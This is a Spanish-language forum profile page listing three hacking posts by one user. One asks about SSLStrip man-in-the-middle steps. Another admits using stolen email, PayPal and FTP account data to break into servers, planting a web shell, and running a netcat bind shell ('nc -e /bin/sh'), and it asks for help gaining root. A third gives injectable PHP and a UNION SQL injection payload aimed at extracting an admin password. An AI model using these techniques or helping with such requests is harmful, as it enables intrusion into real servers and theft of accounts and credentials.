Últimos Temas de: baran0wa

Mostrar Temas
Páginas: [1]

1	Seguridad Informática / Hacking / Ayuda con duda SSLStrip	en: 29 Junio 2011, 02:00 am
Buenas gente, estoy haciendo unas pruebas de laboratorio con SSLStrip y acabo de ver algo que habia pasado por alto. Los pasos que todos siguen son: 1 - Habilitar el forwarding 2 - Agregar redireccion en iptables 80 -> 1000 o el puerto q quieran 3 - Iniciar SSLStrip 4 - ARPSpoof Ahora bien.... funciona barbaro solo cuando el usuario escribre a medias la URL y no pone el https. Estoy probando poner https://gmail.com y el sslstrip no hace magia, la pagina se carga sin problemas por https Pense q el problema podría ser que no está la redirección en las las iptables, asi que agregué la redireccion del 443 al 1000...pero el resultado fue peor...el firefox me pone conexión interrumpida... y si lo pienso no esta mal...pido https y me da http sin error...algo no va ¿? $:-\$ Alguien había probado esto ya?...

2	Seguridad Informática / Hacking / Netcat - Escalacion de privilegios Linux	en: 22 Mayo 2011, 03:04 am
Buenas gente, les cuento que ando haciendo a ver si alguien es mas iluminado y me tira una linea para poder salir del hoyo en el que estoy. Tengo una base con 25K de mails, varias con cuentas de PP y AlertPay de distintos PTC, entre ellas encontre varias cuentas de FTP. entre en varios de los servidores y estoy tratando de hacer una conexion a mi Backtrack y ahi quiero ver como hacer escalacion de privilegios para hacerme root. El server donde estoy intentando no me dejo subir la c99 porque tiene algun tipo de chequeo pero puder subir otra shell y estuve revisando todo el server sin encontrar nada que me ayude. En la mayoria de los directorios tengo 755, pero no en todos y menos en los que interesan, tengo la lista de usuarios del server porq puedo leer el /etc/passwd y el /etc/hosts de donde puede ver que la red interna tiene muchos servers. Bien hasta aca la intro, ahora estoy tratando de ejecutar el netcat para abrir la conexion que supuestamente se ejecuta pero al intentarme conectar desde mi BT me da timeout. La version de netcat que tiene es 0.7.1: nc -l -p 3231 -e /bin/sh 2>&1 El proceso corre: *ps -ef\|grep nc* XXX 17005 17001 0 21:33 ? 00:00:00 nc -l -p 3333 -e /bin/sh XXX 17420 17416 0 21:34 ? 00:00:00 sh -c nc -l -p 3231 -e /bin/sh 2>&1 XXX 17421 17420 0 21:34 ? 00:00:00 nc -l -p 3231 -e /bin/sh XXX 20316 20313 0 21:57 ? 00:00:00 sh -c ps -ef\|grep nc XXX 20318 20316 0 21:57 ? 00:00:00 grep nc Estoy tratando de ver si las iptables me estan filtrando, pero me da un error: iptables -L 2>&1 iptables v1.4.2: can't initialize iptables table `filter': Table does not exist (do you need to insmod?) Perhaps iptables or your kernel needs to be upgraded. La salida del uname -a: Linux XXX 2.6.32.15-grsecPapasito #5 SMP Tue Jun 22 03:21:13 ART 2010 x86_64 Dual Core AMD Opteron(tm) Processor 275 GNU/Linux Bueno espero q alguien pueda darme una idea de como seguir para poder hacerme root, desde ya gracias gente!!!!

Seguridad Informática / Nivel Web / Ayuda SQL INYECTION!

en: 21 Octubre 2010, 02:24 am

Buenas gente estoy haciendo unas pruebas de sql inyection y no encuentro como hacerlo andar... tengo la certeza de que se puede... pero no puedo hacerlo funcionar!!

El PHP que estoy usando es el siguiente:

Código:

<?
$id=$_GET[id];

include("config.php");
include("includes/mysql.php");
$Db1 = new DB_sql;
$Db1->connect($DBHost, $DBDatabase, $DBUser, $DBPassword);

$sql=$Db1->query("SELECT * FROM banners WHERE id='$id'");
$banner=$Db1->fetch_array($sql);
$sql=$Db1->query("UPDATE banners SET clicks=clicks+1 WHERE id='$id'");

$Db1->sql_close();

header("Location: $banner[target]");
exit;
?>

La base tiene varias tablas, el PHP anterior consulta la tabla banners que tiene la siguiente estructura:

Código:

CREATE TABLE IF NOT EXISTS `banners` (
  `id` int(11) NOT NULL auto_increment,
  `title` text NOT NULL,
  `size` int(11) NOT NULL default '0',
  `target` text NOT NULL,
  `banner` text NOT NULL,
  `views` int(11) NOT NULL default '0',
  `clicks` int(11) NOT NULL default '0',
  `credits` int(11) NOT NULL default '0',
  `dsub` text NOT NULL,
  `username` varchar(25) NOT NULL default '',
  `pref` varchar(30) NOT NULL default '',
  `forbid_retract` int(11) NOT NULL default '0',
  `daily_limit` int(11) NOT NULL,
  `views_today` int(11) NOT NULL,
  PRIMARY KEY  (`id`),
  KEY `pref` (`pref`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;

Mi intencion es hacer un query y obtener la password del usuario "admin" o hacerle un update. La consulta que estoy haciendo busca un id inexistente y despues "trato" de hacer una union:

Código:

http://localhost/test.php?id=144440' UNION ALL SELECT 1,2,3,password,5,6,7,8,9,10,11,12,13,14 from user where '1

Supuestamente debería funcionar pero como hay un SELECT y despues un UPDATE y ambos hacen uso de la misma variable termina dando error y no puedo obtener nada

Código:

Database error: Invalid SQL: UPDATE banners SET clicks=clicks+1 WHERE id='144440' UNION ALL SELECT 1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16 from user where '1'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION ALL SELECT 1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16 from user where '' at line 1)
Session halted.

Como ven el primer SELECT supuestamente lo esta haciendo, pero muero en el UPDATE...

Si alguien me puede poner un poco de luz en el camino se va a agradecer!!!

Páginas: [1]